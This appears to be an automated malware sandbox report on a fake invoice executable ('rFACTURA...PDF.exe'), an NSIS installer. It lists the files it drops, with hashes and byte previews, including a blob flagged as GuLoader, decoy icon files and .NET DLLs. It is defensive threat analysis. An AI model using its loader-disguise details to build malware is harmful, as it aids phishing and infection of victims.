File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4928
Entropy (8bit):	4.552958834584104
Encrypted:	false
SSDEEP:	48:cvIwwtl8zs+e702I7VFJ5WS2CfjkLs3rm8M4JdpPFOo/+q8vrpGvktd:uILfz7GySPfnJF/KIvktd
MD5:	78A0C11C168CDC2D5F74C2BEEA25637A
SHA1:	850126AB6E4157230C5FFC3A93CC94C3EDA0975A
SHA-256:	87920F454E599C8EE65E0F3F86BA5AB57473822CB516A507753D55CEA79412B9
SHA-512:	FD57DD4E26B1E020CD67AD7834870539DA41B2723377F846504D15ED2D326F14564513D23A596E0BFDD7848F6FDB61AAECF7F0345BF4AC56F4BE1A21556F9EA8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222060348" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Nikotins61.sto

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	ASCII text, with very long lines (22842), with no line terminators
Category:	dropped
Size (bytes):	22842
Entropy (8bit):	2.691165226704503
Encrypted:	false
SSDEEP:	384:WHfXmxNkvIy6aQ+y57fZOKip2EuiP7Ecw8b:WHfWxNkvIy6axy57fAK82EuiP7Ecw8b
MD5:	27DC252D9E7B26BA6BF2C6D437997658
SHA1:	F81398F1F6FC24692BA8DF740CA2BF2AB73B27D6
SHA-256:	530F4F75B62CB7E1B585671E4F184AC9C667FC4335CDA4120D27136E6F4F0100
SHA-512:	473F5FED1BA3F62088A6ABE0D383EE9220DAABCB8524EFE8AC502B7503F4ACBA3DDAC69BBF1E046B5235C51129F2BF55F54C1D75285D7C5EE824C6DCA88D323D
Malicious:	false
Preview:	00080000000000000000F3008800000000000000D9D900D3000000BA000000444444003D000065000000666600003200A600F200007C7C0000FDFDFDFD00AE00009898989800000000A200000000B6000000000000001000000066007A00AEAE00393939393939000000C3C30000000000A9005F00002100FAFAFAFA003636007C00007000000053000000BCBC00AD000900000000000000D3000081810015151500000000D7D7D7D70000BABA0000D600001D1D00EDEDED00009999000300ED008E000000000000000000B6B6000000E3E300000000010000A5A50000D10000D70000868600DFDFDFDF000007000000AD00D40000EDEDEDED00000013000000C600C6000000000707000000006969690015009000212121000000004F4F4F0022000000B4B4006B6B000E00007800000000373700700000D300F2F2F2F200B5B5B50021000000BA00990042001C1C002E000000003E0000BC0000000000000000002828000000D4D4000B00EB0000CE001D1D00F200000009090900140000003F3F3F00000000009E9E0000000A0A00DEDEDEDEDE00000000A6A6001E0000007D0000000000D20000010000005050000800D70000969696000000A3A30000B9B900000F00005050500000000036002020000000000000000000D9D9D90075757500D9D9D90099990008000000D6D6D600747474

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32368
Entropy (8bit):	6.393948275188786
Encrypted:	false
SSDEEP:	384:yWweWqlXnYcLpSfX0lawccfNXLWrdzy+A2jc2EPLNtAf/uPHRN7AJ/AlGseC62c:EqlXYcgEAwcc17Wc+bj+PLHuMU/xjx2c
MD5:	F2A123183E106BB1CF19376A8079D171
SHA1:	2B96296BE92D5F2EF7C59A70858AF4CAABC99A9D
SHA-256:	896D4ED138C35ECF19AE432380096562872EAB103F7E352C15D214FD875B337A
SHA-512:	FCA6A89EFB16780A06CD25A55638882970F03E1535180A0E463AF9794184B04EB345CF29B12D4F261094E04A584E9225A7AD36A62631227451059F64A77B3C67
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: rJUSTIFICANTEDEPAGO.exe, Detection: malicious, Browse Filename: rAEAT-AvisodeNotificaci__n.exe, Detection: malicious, Browse Filename: AEAT-Notificaci#U00f3n..rar, Detection: malicious, Browse Filename: PO-TO003256.exe, Detection: malicious, Browse Filename: PO-TO003256.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe, Detection: malicious, Browse Filename: DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe, Detection: malicious, Browse Filename: DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe, Detection: malicious, Browse Filename: PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe, Detection: malicious, Browse Filename: DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe, Detection: malicious, Browse Filename: PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....[............" .....P................................................................`...@......@............... ......................................<........Z..p$...p..........T...............................................................H............text....N.......P.................. ..`.data........`.......R..............@....reloc.......p.......X..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.f.l.e.c.t.i.o.n...T.y.p.e.E.x.t.e.n.s.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...j.!...F.i.l.e.D.e.s.c.r.i.p.

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dll

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	14952
Entropy (8bit):	6.599053939997928
Encrypted:	false
SSDEEP:	192:mrlnC6xxk2R5Ws+Wql73WOL8/pCuPHnhWgN7aoWTF6lI+XqnajlkEv:6nbW2R5Ws+Wql7//uPHRN7SIImlqW
MD5:	EDA04E04EBC0EBF7F8BBF30C4DAE6DE3
SHA1:	7BC4D50E6EEC7F04A9272BFEE4E4DB6F278DBE63
SHA-256:	F3E55CB3ADFA93F563B09114D93062E680AB0864C220491458FBE151798B862F
SHA-512:	7027DA3404675596B71394B660E600DA12C0750895F624776362167869760555EE9990699FFC9E4407301FC9437B2F638E2734B8BDEF3C7054990FD5A9C86550
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0.............^+... ........@.. ....................................`..................................+..K....@..................h$...`......T..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@+......H........ ......................P ......................................H>.s..X.\...3V...?G../..3q..l.L.....qKy6b..u"HO...JmYQ.....J..,.S..".R..=1RY.....\?.&dM........@'J.j.:.'.A.../..........I.BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................3.........@...........Y...................`.................g...?.g.....g...y.g.....g.....g.....g...`.g...m.g.................

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	224632
Entropy (8bit):	7.3469254146259635
Encrypted:	false
SSDEEP:	3072:WQyWMNv4aM4IqtUHXAxcNxBrQeb8hlosuRUVGiyKrFyPlWUUVkUiXPQW/NhrsPPR:IWEbtUAixGhlo2I+hyEUJXVFm0XQ
MD5:	D2BE5DE19D44424CCB3F89510938FB53
SHA1:	B98E5FD30E1DE7437187787AFE48AD516223E01F
SHA-256:	0796783FC019D2AD4F01FF7AF14C24A9D3CFBAAB2BB9B44945231A46B6774D2B
SHA-512:	6E54E8C97F5A10921DAD011AAD9FBBA1D4D622CF78F4C977A366EF6C7C49B35552A6100BFAFCC4464B34B351CC200AD9EE12406DDE37FC96C2614BD24A5D0553
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\Talestrmmene.Unr, Author: Joe Security
Preview:	...>........).......OOOO...............###.GG......BB..........T.......#....=...........{{.......++..........V........)._.@...............@@@@...```........*........................................................+..........f.........................7.......9......"..iii....?..88.F..........................P......).........Z...............$.....,......BBB...{{.UU....Q...........@@........''''''.....ttt..................qq........vv..............,............................?..00....W.BB...r.....55........8.9...--......{{.........E.......qqqqq..___.....H.....tt...........0.......WW.............X.55..y........................mm.....................~.D.....(.@@....{{{{{{{{...............oo........SSS..V...]]....33333....7..>.d.????......@@......j.8.TTTT..9......BB.........C..........II...)...........@@.....@@@..&&................z.......ppp.............4.z..........\|........++...\\\...."....................).........v.......................2.l.hh..............l................9.......hhhh

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\battery-level-90-charging-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	6689
Entropy (8bit):	5.135211840989561
Encrypted:	false
SSDEEP:	192:VkjcMIy2+X2I2F2C2G2fH7y8cQaVB2nnuy1FQOcQaVv2q22L2k2s:mjcM7u8xaV8nnL1FQOxaVu6
MD5:	C96D0DD361AFC6B812BDDD390B765A26
SHA1:	71081F096719CAA70B9BAEF86FE642635D8E2765
SHA-256:	6690799E5FA3FB0DD6CCE4BAC5AA1607C8A6BB16507854A87520C7DE53052E1B
SHA-512:	7C73BC880A9401C64AB0571957B414180C1B94137C7BC870BA602979E7A990640A37991CB87A40BC7E5942A37FDA25EFC58C759C00F4344BA3D88B9AA64182DA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000036">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\colorimeter-colorhug-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	227
Entropy (8bit):	6.604776901672149
Encrypted:	false
SSDEEP:	6:6v/lhPysE9Xj1F/bkqdXujFErL4MImATQZu22F+p:6v/7kR7/bjd8Kgm2Q/2y
MD5:	7843C38CC42C6786B3373F166AF10172
SHA1:	BA0163109D9B641B1312230B3F62E1E10A61AA5E
SHA-256:	E3AF1293F8E8AB5C81300196AF55A7C15D5608291D46A2B86D4255910A7D0E59
SHA-512:	B1D3DF6A0A8CACD729CD9A2FD5AB0F74ED611270FA172CDBEB13D46FA71DD5CC5540A2FBFDB6C3004E652D317C8FAD4EC3AE437DF1C082B629870A33CC6BD34F
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...1..P......#.bae....^.^K/fek+........X...........gfw....\.D/..b...a.4..$........H#....o8...}..6.K.....Xc.$ ..'.1.2..vu.../O..>V......CD....<....w........IEND.B`.

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\media-playlist-consecutive-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1329
Entropy (8bit):	4.950241534342892
Encrypted:	false
SSDEEP:	24:t4Cp/YHyKbRAecFxVrGDT/Gfd8hTdyKbRAecFxVrGDT/bNxNxZrGQ:9YHNtAecFmDT/s8hdNtAecFmDT/j3YQ
MD5:	021A9F00A28C9D496E490AE951E8EF12
SHA1:	F8A6392065D07BAC72E138B0E47A24FFDCCEE74B
SHA-256:	B420561770B77FCB47F69B6198B34B11155535F8A2E907BC4A0998CE74AFD340
SHA-512:	7F4F2D904EA968BF68E35E0D7F1EAE9718234757D1989879996BFB49D9C447F67544CB0E1C441FD6539D58B5F2C6ACA7E9E0208738C235D9AF0C093511760212
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M1.018 7v2H14V7z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M11.99 4.99a1 1 0 00-.697 1.717L12.586 8l-1.293 1.293a1 1 0 101.414 1.414L15.414 8l-2.707-2.707a1 1 0 00-.717-.303z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decorati

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\network-offline-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	5.154592341044034
Encrypted:	false
SSDEEP:	24:t4CpQyhEXQDWu4AeWrGMyRQJaPahrGDfJcghSvOqlIQX6e4AeWrGMyp:vhjDWu4Ae3M5wSgDDontqe4Ae3MO
MD5:	EFB3C780BC44B346B50B1F0DC6CF6D0F
SHA1:	472B0EDD1C4C3092BC7C4DF934ABE126885B1780
SHA-256:	990859D3B2C830E23EC276BF1D38A38EE1BA3D89BF04CB138107E4CDE31167B5
SHA-512:	5B9C96F146C6A065C89172D02BDE8020876DC9C78859AD2B8B9529C615215F88BA85C2789544F5C5A247C148BB52FE4B5FCA325E7EAC4826D31A0365A0B8BCBE
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M5 7c-.31 0-.615.09-.812.281L.594 11l3.656 3.719c.198.19.44.281.75.281h1v-1c0-.257-.13-.529-.312-.719L4.406 12H9s1 0 1-1c0 0 0-1-1-1H4.375l1.219-1.281C5.776 8.529 6 8.257 6 8V7z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" color="#000" font-weight="400" font-family="Sans" overflow="visible" opacity=".35"/><path d="M11 11h1.375l1.125 1.094L14.594 11H16v1.469l-1.094 1.062L16 14.594V16h-1.438L13.5 14.937 12.437 16H11v-1.406l1.063-1.063L11 12.47z" style="marker:none" color="#bebebe" overflow="visible"/><path d="M11 9c.31 0 .615-.09.813-.281L15.406 5 11.75 1.281C11.552 1.091 11.31 1 11 1h-1v1c0 .257.13.529.313.719L11.593 4H7c-.528-.007-1 .472-1 1s.472 1.007 1 1h4.625l-1.219 1.281c-.182.19-.406.462-.406.719v1z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:star

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\network-wireless.png

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	891
Entropy (8bit):	7.745720384539504
Encrypted:	false
SSDEEP:	24:d4qWCHdkXfUZEcO5MkIi416cOQSkye9V+:d4qnHd8MkIi4Dpb6
MD5:	5AF147D26AD399F83825377F04FD56A1
SHA1:	B378A498B0DB8114C794E21D533E80CEBE5DDE04
SHA-256:	6147A091847FCC9D9EDB22E655C4FC9DE6632C76D4252350400FA286F9791109
SHA-512:	EEC16DE49A4698FE4F03F841FBCF045FBBDC9D634EB73ED35DB544B6DB4BC0135CD8E1DF102FD1E8BDE9FC75380948B4C0459685EE2C21858D645B7973759EA6
Malicious:	false
Preview:	.PNG........IHDR................a...BIDATx.m.S.%9...$U.Fkl.y].m.6.m.F..5g;k}.........P......~u................M......M.q......\|OM>....:?>.X7.U..j.v..?...e....>.Jk.&.{.[=......t.d.....4.D...V....b..s.L.....Jg,..=V..@.n......Rqv...._....B.h.;l....A....r.ap....N...1./.O.2.u7#..../.....o....O...[..X,<. .....@v........t...H..Rf..C?q..8.HB.!{K..N.....t..5..1d.+......).......pL.5.R..=....jC"....t6.BA.)....xZ..d..^W~yU...ya......U/...VA.r.....r.U....[".D.).8..iO<..[.....t.e9S...K8!....K..&p..Y2l.....".P8:..v..0....zd..''....O?+^.. =..b....t..K../.......?.?5...c.[.f.nP.P.o....7..k..t.?P(..O>.H~...n..jh.'..]..SC.5M.....'.}.n..'...t..9..c*...Ki...t..1z..N.q...w.w..y..W...K7x.^..p....j...%..3.\|.....x...G.\|~..a.o.N.<.......wK...]..u..........`...(z.B!.?q.b..u..$(.#1..N...b.u...@h...\|.w..g....}i....?~......1~...l..]h......IEND.B`.

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\preferences-desktop-font-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	225
Entropy (8bit):	6.596645802250635
Encrypted:	false
SSDEEP:	6:6v/lhPysi5NuhsPwRngRfPq/3+phjSfVsup:6v/7thstJACSNsc
MD5:	F894266AB6A933B2FDA751E6490C319A
SHA1:	2D2D3635198FEEFCB64D1D6B3CDCCDC4EA3DF4B0
SHA-256:	95F533585B4C61936C369557B3B7E397E56545A4C9DB9A5BDDD0E9ABB7A7F7E7
SHA-512:	977ED04753C3CB2B883D03A2A55001F6FCC8617DC3060B6C25AB7E5C691C3F76049E7DEADC7F6567AB7E8DC8492DE2874E8E632CF3EAD7B39ABC8CC98D331442
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8..1..@.E...".u.`..#.v.,r.[..1$..]B.@6.,,.e.....fwg...._)9........y..[n...t.$g..:...P....@k.q......W.. .PY.$z..x....t..(-~!.0$:P.t......`.......Ba..Y.....IEND.B`.

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\task-due-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	263
Entropy (8bit):	6.731374842054556
Encrypted:	false
SSDEEP:	6:6v/lhPysw9TXm0RZC/8xhbPgfdSwj4vw29OjuAO4+ZvYNVp:6v/7QVXm0a/8xhbPgfdSBvNYn2ZvYd
MD5:	003B524806C1CA654CAC6ED2EB883E1B
SHA1:	F6F6ACA125DC4DB3B33378404017B5EE7D21D334
SHA-256:	2899E53769FA741E2C0675A2C69D2C246A8F34601BEE58DD66B16261005962A9
SHA-512:	AA905997F9CE39F039E33C4CCA167C0137775D91B4929D918528BA00B92737C448EC46D91A4221644CCC00D1FCAA403AFF83F07276BAB6FD80D4B9E88E652F87
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...K..1.D......g.e=.x......[]....Y$J'..`.@.S)R.4.q.D.K....x..%..0>~.;}..^.X....Lt.f!..K.....D.&,.7,..BM..t@..}N..o.?.....Hv.J...(..r.. ..)L....&..dT<..1y...X..X...............q...p..p.....IEND.B`.

C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\window-close.png

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	337
Entropy (8bit):	7.143668471552015
Encrypted:	false
SSDEEP:	6:6v/lhPWFmX9Ckymx8BZhCjO5QO6MsHqd+K/eBDQeU2oG9xqgjp:6v/7K0omx8yOqVtHH1U2oGR
MD5:	7FBFE5B0A7AD2A67AACFD8481F8DCA01
SHA1:	21BABB6B7EC4746835DB43DC6A69A4AF0EFECA2D
SHA-256:	0B4CD789E087F712F131FACCD754DC461774498DF3CA19B346D461D18A0AE622
SHA-512:	3A8F0D9653301F789A0588E848C40FFC92394461BF70A3421ABC85647F2C115948134FE9E161D055A11D200536356A15677D9C0E645346D27E122001F67FE22B
Malicious:	false
Preview:	.PNG........IHDR................a....IDATx..S.r.P..=7.cw.....W.m...=......V....I...K.?#@D.0G......R.rF..^$....p..b..f.<.T.z......... +..3#.v.K...$....pT.j.....[.......r..p....O.2.Y.T.,......==...9{/...T./....Qa...3%....5...xmkI.7.1..P,g.%y..J..#^.e..I(.%jzI..#../..49...*..?#..I. =~..E.,MN@........`...../...=.-...1....IEND.B`.

C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\AdvSplash.dll

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.496995234059773
Encrypted:	false
SSDEEP:	96:1IUNaXnnXyEIPtXvZhr5RwiULuxDtJ1+wolpE:1Ix3XyEwXvZh1RwnLUDtf+I
MD5:	E8B67A37FB41D54A7EDA453309D45D97
SHA1:	96BE9BF7A988D9CEA06150D57CD1DE19F1FEC19E
SHA-256:	2AD232BCCF4CA06CF13475AF87B510C5788AA790785FD50509BE483AFC0E0BCF
SHA-512:	20EFFAE18EEBB2DF90D3186A281FA9233A97998F226F7ADEAD0784FBC787FEEE419973962F8369D8822C1BBCDFB6E7948D9CA6086C9CF90190C8AB3EC97F4C38
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.Y.o.7Eo.7Eo.7Eo.6EF.7E..jEf.7E;..Em.7E..3En.7ERicho.7E........PE..L.....uY...........!................`........ ...............................P......................................`$..E.... ..d............................@..$.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.659384359264642
Encrypted:	false
SSDEEP:	192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
MD5:	8B3830B9DBF87F84DDD3B26645FED3A0
SHA1:	223BEF1F19E644A610A0877D01EADC9E28299509
SHA-256:	F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
SHA-512:	D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	2097152
Entropy (8bit):	4.51255552598015
Encrypted:	false
SSDEEP:	12288:fgvUY6/eee9WwB84iTd+vXlnFbSwv+JnxQ7SLj732JlCGzz4OragmcnYJe:fa9WwB84iTd+vXlnFGMB4OragmcnYJe
MD5:	20E6A7C010975532E296EAFC1D773515
SHA1:	8812E42B1E2D5A5F1F50B10199474541DC543E2F
SHA-256:	A246C551735C3E61750F03DD6002D232027BB37C1358EF70C539A7B7238586AE
SHA-512:	BA5C5C6C87421158407A0BBCE253F89E861A439BB6A7AE244CAB077CAEB1C67BFA90C2B2714D6161B0CADF1BB5DFAB9C455015759B390F2894F33AD9B8064B02
Malicious:	false
Preview:	regf........5.#.^................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.,...[.................................................................................................................................................................................................................................................................................................................................................0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	376832
Entropy (8bit):	2.6699792372502262
Encrypted:	false
SSDEEP:	3072:MS3DFIecejetVNqlWjai5sTBG2qDgebeOeF8DgebeOeDe3TKeme:MYSJevPqc6ns8c6nie3TKz
MD5:	0DB3DF965CE165E0BDB01BD97F87AB60
SHA1:	F551D0441A56D23A34BF1D0F854DB1AFFA2E0B7A
SHA-256:	EF041A829B69554F81F0EADAD45AB37647D3BD4D7FF365C485A37863B084DFB8
SHA-512:	7A3682900253113666604F1F95B96AA421E06A7319B617106450BB5E2791FA0A9E78F3E5D23FC923A922BB0B6F75620A54A4230ACAAC199728FAF9E3EEE9511E
Malicious:	false
Preview:	regf........5.#.^................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.,...[.................................................................................................................................................................................................................................................................................................................................................0HvLE......................5d.-:.;....[Pu.................`....................... ... ...`... ..hbin................5.#.^...........nk,....S...............................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk ..."..(......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...................................Z.......................Root........lh..

\Device\ConDrv

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.5750027080925975
Encrypted:	false
SSDEEP:	3:WNEDkFrA7fw3eqIusdHSdX7/fWmEdIOAlwV6EwqQLWFBaaafFa/Rv/naaaaqBcn:WsTbtyxkKO+dZWF7afFoRHRaaqBc
MD5:	8D14AB4128F9BFE3E4F5F9B160BBFFE7
SHA1:	7EA846DF04D4120A819DB47723C716BF2610E5CD
SHA-256:	91D7EA682DB129FD33DA04168DB3BFCA08EA8B6CB0533C559E0ADC0DA5BD56E8
SHA-512:	BF72FC0F59202B09E92961CE6C6CF21D3BBBB22AAA6B0A6B3FFBA2392362BF30A6B874A6CBBF6D11F06975CDDDBDB247053222D34D4F24055E50C0AFC9802E65
Malicious:	false
Preview:	.Unhandled Exception: System.Runtime.InteropServices.SEHException: External component has thrown an exception... at ????_.?;???.?????().. at ?????.?@???.Main().

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.02530526585537
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rFACTURA_FAC_2023_1-1000733.PDF.exe
File size:	431872
